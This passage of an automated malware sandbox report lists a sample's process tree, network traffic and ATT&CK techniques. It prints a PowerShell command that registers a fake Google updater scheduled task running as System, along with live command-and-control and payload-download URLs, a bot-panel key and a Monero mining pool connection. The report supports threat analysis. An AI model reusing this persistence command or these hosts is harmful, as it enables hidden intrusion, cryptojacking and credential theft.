    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3980
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1084
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4220
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2176
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4804
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4508
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:5004
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3732

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
1⤵
- Executes dropped EXE
PID:1052

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4752

Network

DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

208.194.73.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.194.73.20.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=21C9C251C11D6CFA3BD6D1D9C0556DA5; domain=.bing.com; expires=Fri, 04-Oct-2024 15:52:51 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CC1E1674A06345819A83617DF7FC0AFB Ref B: BRU30EDGE0916 Ref C: 2023-09-10T15:52:51Z
date: Sun, 10 Sep 2023 15:52:50 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=21C9C251C11D6CFA3BD6D1D9C0556DA5

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 05BC1BCC1DED44239B714FE9FC4402A5 Ref B: BRU30EDGE0916 Ref C: 2023-09-10T15:52:51Z
date: Sun, 10 Sep 2023 15:52:50 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=21C9C251C11D6CFA3BD6D1D9C0556DA5

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B7593BE4BD8C4E6AB8C0018D837C4BBA Ref B: BRU30EDGE0916 Ref C: 2023-09-10T15:52:51Z
date: Sun, 10 Sep 2023 15:52:50 GMT
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
POST

http://45.15.156.208/jd9dd3Vw/index.php?scr=1

oneetx.exe

Remote address:

45.15.156.208:80

Request

POST /jd9dd3Vw/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzY0MzU=
Host: 45.15.156.208
Content-Length: 76587
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://45.15.156.208/jd9dd3Vw/index.php

oneetx.exe

Remote address:

45.15.156.208:80

Request

POST /jd9dd3Vw/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 45.15.156.208
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://45.15.156.208/jd9dd3Vw/index.php

oneetx.exe

Remote address:

45.15.156.208:80

Request

POST /jd9dd3Vw/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 45.15.156.208
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://45.15.156.208/jd9dd3Vw/index.php

oneetx.exe

Remote address:

45.15.156.208:80

Request

POST /jd9dd3Vw/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 45.15.156.208
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:53:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://45.15.156.208/jd9dd3Vw/index.php

oneetx.exe

Remote address:

45.15.156.208:80

Request

POST /jd9dd3Vw/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 45.15.156.208
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

second.amadgood.com

oneetx.exe

Remote address:

8.8.8.8:53

Request

second.amadgood.com

IN A

Response
GET

http://194.180.49.153/udp/taskmask.exe

oneetx.exe

Remote address:

194.180.49.153:80

Request

GET /udp/taskmask.exe HTTP/1.1
Host: 194.180.49.153

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:54 GMT
Content-Type: application/octet-stream
Content-Length: 2144352
Last-Modified: Tue, 29 Aug 2023 14:45:16 GMT
Connection: keep-alive
ETag: "64ee047c-20b860"
Accept-Ranges: bytes
GET

http://194.180.49.153/udp/rdpcllp.exe

oneetx.exe

Remote address:

194.180.49.153:80

Request

GET /udp/rdpcllp.exe HTTP/1.1
Host: 194.180.49.153

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:56 GMT
Content-Type: application/octet-stream
Content-Length: 7380480
Last-Modified: Mon, 21 Aug 2023 09:44:06 GMT
Connection: keep-alive
ETag: "64e331e6-709e00"
Accept-Ranges: bytes
GET

http://194.180.49.153/udp/taskhostclp.exe

oneetx.exe

Remote address:

194.180.49.153:80

Request

GET /udp/taskhostclp.exe HTTP/1.1
Host: 194.180.49.153

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:52:59 GMT
Content-Type: application/octet-stream
Content-Length: 3167008
Last-Modified: Mon, 21 Aug 2023 09:40:10 GMT
Connection: keep-alive
ETag: "64e330fa-305320"
Accept-Ranges: bytes
DNS

208.156.15.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.156.15.45.in-addr.arpa

IN PTR

Response
DNS

153.49.180.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.49.180.194.in-addr.arpa

IN PTR

Response
DNS

86.192.199.128.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.192.199.128.in-addr.arpa

IN PTR

Response
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

vbc.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/ip

vbc.exe

Remote address:

104.26.13.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 10 Sep 2023 15:53:09 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aUDaxAISvRpMIyTkmNciasucLDBgl78oC74pvomC2SKrw9sWobwM421PnQFRVvVsnTIIwdhLx82E6Otb4k8CdWGcrL6aSGy4ixhbitH3vWzRRvVsWNd0PCpMNg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8048d79bcd63b742-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

254.21.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.21.238.8.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
GET

http://206.189.229.43/bot/regex

ntlhost.exe

Remote address:

206.189.229.43:80

Request

GET /bot/regex HTTP/1.1
Host: 206.189.229.43
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:53:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://206.189.229.43/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin

ntlhost.exe

Remote address:

206.189.229.43:80

Request

GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin HTTP/1.1
Host: 206.189.229.43
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:53:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://206.189.229.43/bot/regex

ntlhost.exe

Remote address:

206.189.229.43:80

Request

GET /bot/regex HTTP/1.1
Host: 206.189.229.43
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:54:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://206.189.229.43/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin

ntlhost.exe

Remote address:

206.189.229.43:80

Request

GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin HTTP/1.1
Host: 206.189.229.43
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 15:54:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
DNS

240.81.21.72.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.81.21.72.in-addr.arpa

IN PTR

Response
DNS

43.229.189.206.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.189.206.in-addr.arpa

IN PTR

Response
DNS

xmr.2miners.com

explorer.exe

Remote address:

8.8.8.8:53

Request

xmr.2miners.com

IN A

Response

xmr.2miners.com

IN A

162.19.139.184
DNS

184.139.19.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

184.139.19.162.in-addr.arpa

IN PTR

Response

184.139.19.162.in-addr.arpa

IN PTR

p062minerscom
DNS

169.117.168.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.117.168.52.in-addr.arpa

IN PTR

Response

204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

tls, http2

1.9kB
9.3kB
22
20

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b8103afddd7f41b5b638b5acb230668e&localId=w:E96BCE24-8B3A-3BD6-B6FE-5A4838F297EB&deviceId=6966549481478668&anid=

HTTP Response

204
45.15.156.208:80

http://45.15.156.208/jd9dd3Vw/index.php

http

oneetx.exe

478.5kB
218.7kB
9678
5448

HTTP Request

POST http://45.15.156.208/jd9dd3Vw/index.php?scr=1

HTTP Response

200

HTTP Request

POST http://45.15.156.208/jd9dd3Vw/index.php

HTTP Response

200

HTTP Request

POST http://45.15.156.208/jd9dd3Vw/index.php

HTTP Response

200

HTTP Request

POST http://45.15.156.208/jd9dd3Vw/index.php

HTTP Response

200
45.15.156.208:80

http://45.15.156.208/jd9dd3Vw/index.php

http

oneetx.exe

517 B
610 B
6
5

HTTP Request

POST http://45.15.156.208/jd9dd3Vw/index.php

HTTP Response

200
194.180.49.153:80

http://194.180.49.153/udp/taskhostclp.exe

http

oneetx.exe

431.9kB
13.1MB
9342
9340

HTTP Request

GET http://194.180.49.153/udp/taskmask.exe

HTTP Response

200

HTTP Request

GET http://194.180.49.153/udp/rdpcllp.exe

HTTP Response

200

HTTP Request

GET http://194.180.49.153/udp/taskhostclp.exe

HTTP Response

200
128.199.192.86:81

vbc.exe

5.6MB
74.6kB
4106
1629
104.26.13.31:443

https://api.ip.sb/ip

tls, http

vbc.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
206.189.229.43:80

http://206.189.229.43/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin

http

ntlhost.exe

1.1kB
2.2kB
11
12

HTTP Request

GET http://206.189.229.43/bot/regex

HTTP Response

200

HTTP Request

GET http://206.189.229.43/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin

HTTP Response

200

HTTP Request

GET http://206.189.229.43/bot/regex

HTTP Response

200

HTTP Request

GET http://206.189.229.43/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=KMGZTCGZ\Admin

HTTP Response

200
162.19.139.184:12222

xmr.2miners.com

tls

explorer.exe

1.3kB
7.2kB
7
9

8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

208.194.73.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

208.194.73.20.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

second.amadgood.com

dns

oneetx.exe

65 B
135 B
1
1

DNS Request

second.amadgood.com
8.8.8.8:53

208.156.15.45.in-addr.arpa

dns

72 B
72 B
1
1

DNS Request

208.156.15.45.in-addr.arpa
8.8.8.8:53

153.49.180.194.in-addr.arpa

dns

73 B
148 B
1
1

DNS Request

153.49.180.194.in-addr.arpa
8.8.8.8:53

86.192.199.128.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

86.192.199.128.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

vbc.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.13.31

104.26.12.31

172.67.75.172
8.8.8.8:53

31.13.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.13.26.104.in-addr.arpa
8.8.8.8:53

254.21.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

254.21.238.8.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

240.81.21.72.in-addr.arpa

dns

71 B
142 B
1
1

DNS Request

240.81.21.72.in-addr.arpa
8.8.8.8:53

43.229.189.206.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

43.229.189.206.in-addr.arpa
8.8.8.8:53

xmr.2miners.com

dns

explorer.exe

61 B
77 B
1
1

DNS Request

xmr.2miners.com

DNS Response

162.19.139.184
8.8.8.8:53

184.139.19.162.in-addr.arpa

dns

73 B
102 B
1
1

DNS Request

184.139.19.162.in-addr.arpa
8.8.8.8:53

169.117.168.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

169.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery